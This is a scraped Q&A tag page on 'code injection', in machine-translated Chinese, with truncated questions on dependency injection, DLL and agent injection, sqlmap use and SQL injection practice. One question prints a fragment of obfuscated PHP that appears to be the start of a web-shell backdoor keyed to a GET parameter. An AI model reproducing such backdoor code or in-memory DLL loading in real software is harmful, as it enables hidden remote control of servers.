code-injection

0熱度

1回答

的SonarQube提示（規則「Web applications should use validation filters」）表明，這種標準的解決方案： public class ValidatingHttpRequest extends HttpServletRequestWrapper { // ... } public class ValidationFilter imp

0熱度

1回答

如何比較x86程序集中的兩個地址？

我試圖做一些字節注入程序來執行一個特定的任務ecx+5C等於一個特定的地址，我提供了一個立即值。我正在嘗試執行如下操作：cmp [ecx+5C], 1D59D3BC。但是我得到一個錯誤。有誰知道我可以如何將寄存器+偏移地址與x86彙編中的直接地址進行比較？

0熱度

1回答

未找到代理JAR或沒有代理類屬性

//已修復：由於代碼原因，這不是錯誤。這是因爲IDE。我只是試圖爲一款名爲「我的世界」的遊戲進行注入。但我有一個問題。它無法加載代理。這裏是例外：Exception in thread "main" com.sun.tools.attach.AgentLoadException: Agent JAR not found or no Agent-Class attribute at sun.t

-1熱度

1回答

託管DLL注入？

基本上我想採取一個C＃DLL，加密它並將其保存爲一個文件。然後另一個應用程序打開這個文件，將其解密成一個字節數組，並且不將這個文件保存到文件中，在內存中的這個解密緩衝區中調用一個方法。到目前爲止，我只能在unmanaged dll上做到這一點，但我想知道是否有人能夠幫助我瞭解我應該做什麼，因爲我在Google上花費了幾個小時後幾乎找不到任何信息。

0熱度

2回答

在sqlmap中打印注入參數的值

我使用sqlmap注入和URL看起來像 python sqlmap.py -u「http://localhost/utility/?site_name=30」所以我只是想知道什麼是值sqlmap嘗試爲site_name注入輸入。

1熱度

1回答

的Symfony - 得到控制

我使用的symfony 3並試圖獲得訪問類從另一個文件訪問方法我在 src/AppBundle/Service/ApiEngine.php namespace AppBundle\Service; use DateTime; class ApiEngine { private $api_handler; public function __construct($u

0熱度

1回答

法律網站SQL注入攻擊

我必須撰寫基於簡單SQL注入攻擊的報告。在這份報告中，我必須提供我的「漫遊」截圖，所以我不能在網上使用其他教程的圖片。現在我的問題是：任何人都可以告訴我一些易受SQL注入攻擊攻擊的網站的名稱，我可以合法測試我的攻擊嗎？感謝Google dorks，我已經發現了一些易受攻擊的網站，但我認爲對它們進行攻擊是非法的。我想避免爲此設立個人網站，但如果沒有其他解決方案，我需要幫助建立這種網站。

2熱度

1回答

我的一些腳本中出現了令人討厭的php代碼

我有一個定期託管計劃的系統，該公司沒有錢獲得一個雲計劃，所以我用它來啓動，他們現在計劃更改爲一項專門的服務。它的php + mysql簡單系統可以跟蹤一些用戶並生成郵件列表和其他一些東西。的問題是，在一些文件我已經看到了，我還沒有輸入一個代碼...我無法理解的代碼是關於什麼的，所以我在這裏向您展示： $khg= '_'."GE".'T';if (!empty(${$khg}['15'])) p

0熱度

1回答

如何將Javascript注入https網站？

我有一個項目，我必須注入Javascript到網站使用瀏覽器。我的意思是我去開發工具 - >控制檯 - >輸入以下內容： window.FO_DEBUG=true; var b=document.getElementsByTagName("head")[0].appendChild(document.createElement("script")); b.src="//path-to-file

0熱度

1回答

如何在運行時取代統一注入

我有一個抽象類，併爲它執行兩個實現。 public abstract class Person{ public abstract string GetName(); } public class Doctor : Person{ public override string GetName() { return "Doctor"; } }